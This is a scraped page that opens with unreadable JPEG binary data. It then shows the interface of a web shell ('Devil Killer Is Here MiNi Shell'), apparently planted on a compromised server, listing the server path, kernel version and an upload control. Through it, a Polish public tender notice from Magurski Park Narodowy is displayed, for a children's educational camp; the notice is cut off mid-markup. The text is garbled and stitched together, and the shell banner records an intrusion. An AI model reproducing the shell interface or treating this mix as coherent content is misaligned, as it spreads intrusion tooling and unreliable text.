JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250409/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250409/0018355401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie 5 dniowego obozu edukacyjnego dla dzieci z Polski i Ukrainy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Magurski Park Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180789309</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krempna 59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krempna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-232</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134414099</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@magurskipn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">mpn.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie 5 dniowego obozu edukacyjnego dla dzieci z Polski i Ukrainy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00183554</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00089237/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Organizacja kampów (zakwaterowanie, wyżywienie, materiały szkoleniowe, transport)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Carpathian Youth For Eco Smart Education - umowa nr PLUA.01.03-IP.01-0017/23-0 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, przekazywanie dokumentów elektronicznych odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej tj.: a) przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl b) poczty elektronicznej e-mail: zamowienia@magurskipn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, przekazywanie dokumentów elektronicznych odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej tj.: a) przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl b) poczty elektronicznej e-mail: zamowienia@magurskipn.pl<br/>2) Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29<br/>3) Zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia udostępniane będą na stronie internetowej prowadzonego postępowania https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w „Instrukcji użytkowania systemu” oraz w ”Regulaminie Platformy e-zamowienia”, regulamin oraz informacje zamieszczone w zakładce „ Centrum pomocy” dostępnym na stronie internetowej https://ezamowienia.gov.pl/<br/>5) Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać aktywne konto podmiotu „Wykonawca” na Platformie e-zamowienia.<br/>2. Złożenie oferty w postępowaniu<br/>1) Wykonawca składa ofertę wyłącznie przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-ba3628d7-b8c0-4b93-b391-f08c71aa5f29 2) Ofertę należy sporządzić w języku polskim i złożyć pod rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3. Sposób komunikowania się zamawiającego z wykonawcami : W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami np. składanie dokumentów, oświadczeń, zawiadomień, zapytań, innych informacji odbywa się drogą elektroniczną za pośrednictwem:<br/>1) dedykowanego formularza dostępnego na Platformie e-zamowienia, dostępnej pod adresem https://ezamowienia.gov.pl („Formularz do komunikacji”)- dokumenty elektroniczne jako załączniki<br/>2) poczty elektronicznej na adres email: zamowienia@magurskipn.pl Zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w Formularzu Ofertowym Wykonawcy, na co Wykonawca wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymywania jego funkcjonalności przez czas trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w Formularzu Ofertowym Wykonawcy zostały doręczone skutecznie, a Wykonawca zapoznał się z ich treścią.<br/>4. Sposób sporządzania i przekazywania dokumentów elektronicznych, wymagania techniczne dla dokumentów elektronicznych, wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej służących do odbioru dokumentów elektronicznych określa rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>5. Dokumenty lub oświadczenia, o których mowa w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, składa się w formie elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>	Administratorem Pani/Pana danych osobowych jest Magurski Park Narodowy z siedzibą w Krempnej; Krempna 59 38-232 Krempna, tel. 13 441 40 99, e-mail: dyrekcja@magurskipn.pl<br/>	Kontakt z inspektorem ochrony danych osobowych w Magurskim Parku Narodowym – adres e-mail: iod@magurskipn.pl<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Zorganizowanie i przeprowadzenie 5 dniowego obozu edukacyjnego dla dzieci z Polski i Ukrainy”<br/>	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 72 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), dalej „ustawa p.z.p.”.<br/>	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy p.z.p.<br/>	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>	Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-370-1-9/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie 5 dniowego obozu edukacyjnego dla grupy 44 dzieci z Polski i Ukrainy (klasy VI – VII) w ramach projektu w ramach projektu: CARPATHIAN YOUTH FOR ECO SMART EDUCATION - umowa nr PLUA.01.03-IP.01-0017/23-00 w terminie 07 – 11 lipca 2025 r. w okolicy Magurskiego Parku Narodowego. Cała grupa będzie zakwaterowana w jednej lokalizacji.<br/>Oferent powinien być wpisany do Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych<br/>1.1	Wymagania wobec Oferenta:<br/>1.	Organizacja wypoczynku zgodnie z wymogami rozporządzenia Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz.U. z Dz.U. z 2016 r. poz. 452) oraz ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz.U. z 2024 r. poz. 750 z późn. zm.), ustawy z dnia 24 maja 2000 r. o Krajowym Rejestrze Karnym (Dz.U. z Dz.U. z 2024 r. poz. 276), ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym, tj. (Dz.U. z 2024 poz. 1802 z późn. zm.).<br/>2.	Organizacja wypoczynku letniego dzieci i młodzieży zgodnie z wytycznymi MEN, MZ, GIS dla organizatorów wypoczynku.<br/>3.	Zapewnienie fachowej kadry opiekuńczej obozu spełniającej poniższe wymagania:<br/>- kierownik, na wyłączność uczestników obozu.<br/>- wychowawcy z wykształceniem pedagogicznym (na jednego wychowawcę nie więcej niż 15 dzieci – na wyłączność uczestników obozu).<br/>- informacja z Rejestru Sprawców Przestępstw na Tle Seksualnym oraz Krajowego Rejestru Karnego, potwierdzająca, że dane osób (kierownika i wychowawców) nie figurują w przedmiotowych rejestrach. <br/>4.	Zabezpieczenie apteczki w podstawowe leki materiały opatrunkowe w czasie podróży i pobytu dzieci na miejscu wypoczynku, a także zapewni ich leczenie zgodnie ze wskazaniami lekarskimi.<br/>5.	Złożenie programu obozu (program na poszczególne dni) uwzględniającego realizację minimum następujących punktów:<br/>- zajęcia przyrodnicze z pracownikami MPN na ścieżce przyrodniczej „Kiczera” zakończone ogniskiem,<br/>- zwiedzanie Ośrodka Edukacyjno – Muzealnego MPN w Krempnej,<br/>- przejście turystyczne obejmujące minimum dwa z następujących miejsc: Świerzowa Ruska, Nieznajowa, pasmo Magurskie (Magura, Wątkowa), Ferdel, wodospad Magurski, Diabli Kamień,<br/>- całodniowy wyjazd do Krynicy z uwzględnieniem zwiedzania Uzdrowiska, dostępnych atrakcji turystycznych oraz wędrówek turystycznych dostosowanych do warunków atmosferycznych oraz możliwości grupy (np. Jaworzyna Krynicka, ścieżka w koronach drzew w Słotwinach, Góra Parkowa, wieża widokowa na Łysuli nad Dominikowicami, itp.) <br/>- kąpiel w otwartych basenach w Krempnej (przy sprzyjających warunkach atmosferycznych)<br/>6.	Zakwaterowanie w budynku z dostępem do pełnego węzła sanitarnego, spełniającego wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowisk określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Teren wokół budynku musi być ogrodzony i bezpieczny.<br/>7.	Zakwaterowanie młodzieży w pokojach wieloosobowych, zapewnienie ogólnie dostępnej świetlicy na terenie obiektu, w którym będą przebywać uczestnicy obozu.<br/>8.	Zapewnienie całodziennego wyżywienia – 4 posiłki (śniadanie, obiad, podwieczorek, kolacja).<br/>- gorący posiłek po przyjeździe dzieci do placówki wypoczynku,<br/>- suchy prowiant + napój na drogę powrotną oraz na czas wycieczek,<br/>- żywienie zgodne z zasadami higieny żywienia określonymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia, (Dz.U. z 2023 r. poz. 1448 t.j.).<br/>9.	Zapewnienie w miejscu wypoczynku przez 24 h na dobę dostępu do napojów ciepłych lub zimnych w zależności od warunków przez cały okres trwania obozu.<br/>10. Zgłoszenia wypoczynku do właściwego kuratorium oświaty.<br/>11. Wykupienia ubezpieczeń dzieci i kadry, w czasie podróży i pobytu na obozie, od następstw nieszczęśliwych wypadków.<br/>12. Zakupu biletów wstępu do obiektów muzealnych, sportowych, kąpielisk.<br/>13. Zapewnienie uczestnikom pakietu szkoleniowego składającego się z: <br/>- dwóch przewodników po ścieżkach przyrodniczych okolicy, gdzie odbywa się obóz, <br/>- mapy turystycznej w skali 1:50 000 terenu, gdzie odbywa się obóz, <br/>- peleryny przeciwdeszczowej w podręcznym opakowaniu<br/>Ilość pakietów powinna wynosić 50 sztuk. Elementy pakietu powinny posiadać także logo Interreg NEXT Polska-Ukraina oraz logo projektu (Youth4EcoEdu). Zamawiający przekaże Wykonawcy niezbędne logotypy po podpisaniu umowy.<br/>14. Zapewnienia transportu autokarowego dla uczestników obozu podczas wycieczek i zajęć realizowanych poza ośrodkiem i jego najbliższym otoczeniem, wraz z kosztami parkingów i opłat drogowych.<br/>15. Złożenia w terminach określonych w SWZ i umowie następujących oświadczeń i informacji:<br/>- o zgłoszeniu obiektu do właściwego kuratorium oświaty,<br/>- o posiadaniu pozytywnej opinii Sanepid i p.poż. dla proponowanego obiektu na wypoczynek dzieci i młodzieży,<br/>- informacji z Krajowego Rejestru Karnego oraz Informacji z Rejestru Sprawców Przestępstw na Tle Seksualnym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63510000-7 - Usługi biur podróży i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55243000-5 - Usługi w zakresie obozowisk dla dzieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-07-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/><br/>1)	Cena - 60% - sposób oceny: według wzoru<br/>2)	Program obozu - 40% - sposób oceny: według wzoru<br/><br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. Ofertom przyznane zostaną punkty obliczone następująco:<br/><br/>1)	Kryterium – Cena – 60%<br/>W tym kryterium zostanie zastosowany następujący wzór:<br/>C = (Cn / Cof.b. x 100) x 60% <br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej,<br/>100 - wskaźnik stały,<br/>60% - procentowe znaczenie kryterium ceny.<br/><br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów (60%). Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów.<br/><br/>2)	Kryterium – Program obozu - 40%<br/>W tym kryterium zostanie zastosowany następujący wzór:<br/>P = (Pn/Pmax x100) x 40 %<br/>Gdzie:<br/>P – oznacza liczbę punktów przyznanych badanej ofercie<br/>Pn - oznacza liczbę punktów uzyskanych przez badaną ofertę <br/>Pmax - oznacza najwyższą uzyskaną liczbę punktów <br/>100 - wskaźnik stały,<br/>40% - procentowe znaczenie kryterium ceny.<br/><br/>Komisja powołana przez Zamawiającego oceniać będzie oceniać program obozu wg. poniższych kryteriów: <br/>Kryteria oceny programu:<br/>1.	Spójność – Możliwość realizacji wszystkich punktów programu zapewniająca edukację połączoną z wypoczynkiem. Proponowane punkty programu zapewniają realizację edukacji przyrodniczej, kulturowej i regionalnej na wysokim poziomie.<br/>2.	Atrakcyjność – Program zawiera minimum te punkty programu, które zostały wymienione w OPZ. Dodatkowe atrakcje zapewnione przez Organizatora, które będą korespondowały z programem całego obozu i będą możliwe do zrealizowania zapewniając komfort Uczestnikom podnoszą wartość tego parametru.<br/>3.	Zastępowalność – Program przewiduje alternatywę dla zajęć i punktów programu, które nie mogą być zrealizowane ze względu na warunki atmosferyczne lub wydarzenia losowe. Alternatywne zajęcia powinny być atrakcyjne i zapewniać realizację celów na takim samym poziomie jak planowane punkty programu. <br/><br/>Skala punktowa ocen komisji: 0 – 10 pkt<br/>Przewodniczący Komisji dokonuje podsumowania ocen poszczególnych członków komisji i wylicza ich średnią arytmetyczną (z uwzględnieniem dwóch miejsc po przecinku), dzieląc uzyskaną sumę punktów przez liczbę członków Komisji, którzy dokonali oceny.<br/><br/>Dalsze wyliczenie punktów zostanie dokonane zgodnie z podanymi wyżej wzorami.<br/><br/>Obliczenie łącznej ilości punktów oferty:<br/>P = C + P<br/><br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wymagania określone w zapytaniu ofertowym oraz uzyska największą sumę punktów ww. kryteriach.<br/>3. W toku dokonywania oceny ofert Zamawiający zastrzega sobie prawo do żądania udzielenia przez Oferenta wyjaśnień dot. treści złożonej przez niego oferty.<br/><br/>Punkty w powyższych kryteriach zostaną zsumowane.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt (100%)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Program obozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 